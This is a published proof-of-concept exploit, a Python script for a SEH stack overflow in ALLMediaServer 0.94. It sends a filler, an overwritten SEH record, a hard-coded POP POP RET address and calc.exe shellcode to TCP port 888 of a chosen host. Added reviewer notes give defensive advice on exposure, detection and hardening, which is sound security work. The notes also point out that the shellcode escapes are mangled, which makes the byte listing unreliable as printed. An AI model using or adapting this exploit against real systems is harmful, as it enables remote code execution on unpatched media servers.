ALLMediaServer 0.94 SEH Overflow
Posted on 08 March 2013
#!/usr/bin/python
"""Proof-of-concept for a SEH-based stack overflow in ALLMediaServer 0.94.

Exploit Title : ALLMediaServer 0.94 SEH Overflow Exploit
Date          : 07/03/2013
Exploit Author: metacom
E-mail        : metacom27@gmail.com
Software Link : http://allmediaserver.org/download
Version       : ALLMediaServer 0.94
Tested On     : Windows 7 German
Author's note : ALLMediaServer run online mod

Usage: allmediaserver.py <ip>

What the script does: it opens one TCP connection to port 888 of the given
host and sends a single oversized message made of "http://", 1065 filler
units, a 4-byte next-SEH record, a 4-byte handler pointer, a NOP pad and a
calc.exe demonstration payload. Nothing is read back from the server.

Reviewer notes for defenders:
  * Exposure: the service parses this message before any authentication step
    visible here, so any host that can reach TCP/888 can trigger it.
    Restrict that port to trusted networks.
  * Detection: a message on TCP/888 that begins with "http://" followed by a
    run of over a thousand identical bytes is not a plausible media request
    and is a reasonable IDS / proxy length-check candidate.
  * Hardening: the handler pointer is a hard-coded address inside
    avcodec-53.dll, so the technique relies on that module loading at a
    fixed address and being accepted as an exception handler -- presumably
    it was built without SafeSEH/ASLR (confirm against the shipped binary).
    SEHOP and rebuilding bundled libraries with /SAFESEH and /DYNAMICBASE
    are the standard countermeasures for this bug class.
  * NOTE(review): the string literals below are reproduced exactly as they
    appear on this page, where backslash escapes are absent; as printed they
    are plain ASCII text rather than the raw bytes the comments describe.
    Do not derive byte-level signatures from this listing without checking
    an authoritative copy.

Written for Python 2 (the payload is sent as a native str).
"""
import socket
import sys

# Target address comes straight from the command line; there is no argument
# validation, so a missing argument raises IndexError.
target_host = sys.argv[1]

# Filler that runs from the start of the request up to the SEH record.
filler = "http://" + "x41" * 1065

# Overwritten exception registration record.
next_seh_record = "xEBx06x90x90"  # Short Jump
handler_ptr = "xCAx24xECx65"  # POP POP RET 0x65EC24CA avcodec-53.dll

# Padding placed between the SEH record and the payload.
nop_pad = "x90" * 50

# Author's demonstration payload, generated with:
#   msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00' -e x86/shikata_ga_nai -t c
poc_payload = (
    "xb8x66xa5xa3x41xdbxd5xd9x74x24xf4x5bx33xc9xb1"
    "x33x31x43x12x83xc3x04x03x25xabx41xb4x55x5bx0c"
    "x37xa5x9cx6fxb1x40xadxbdxa5x01x9cx71xadx47x2d"
    "xf9xe3x73xa6x8fx2bx74x0fx25x0axbbx90x8bx92x17"
    "x52x8dx6ex65x87x6dx4exa6xdax6cx97xdax15x3cx40"
    "x91x84xd1xe5xe7x14xd3x29x6cx24xabx4cxb2xd1x01"
    "x4exe2x4ax1dx18x1axe0x79xb9x1bx25x9ax85x52x42"
    "x69x7dx65x82xa3x7ex54xeax68x41x59xe7x71x85x5d"
    "x18x04xfdx9exa5x1fxc6xddx71x95xdbx45xf1x0dx38"
    "x74xd6xc8xcbx7ax93x9fx94x9ex22x73xafx9axafx72"
    "x60x2bxebx50xa4x70xafxf9xfdxdcx1ex05x1dxb8xff"
    "xa3x55x2axebxd2x37x20xeax57x42x0dxecx67x4dx3d"
    "x85x56xc6xd2xd2x66x0dx97x2dx2dx0cxb1xa5xe8xc4"
    "x80xabx0ax33xc6xd5x88xb6xb6x21x90xb2xb3x6ex16"
    "x2exc9xffxf3x50x7exffxd1x32xe1x93xbax9ax84x13"
    "x58xe3"
)

# Assemble the message in the order the overflow layout requires.
message = "".join([filler, next_seh_record, handler_ptr, nop_pad, poc_payload])

conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.connect((target_host, 888))  # default port
conn.send(message)  # single send; the return value (bytes written) is not checked
print("Exploit sent! Open Calc :) ")
conn.close()
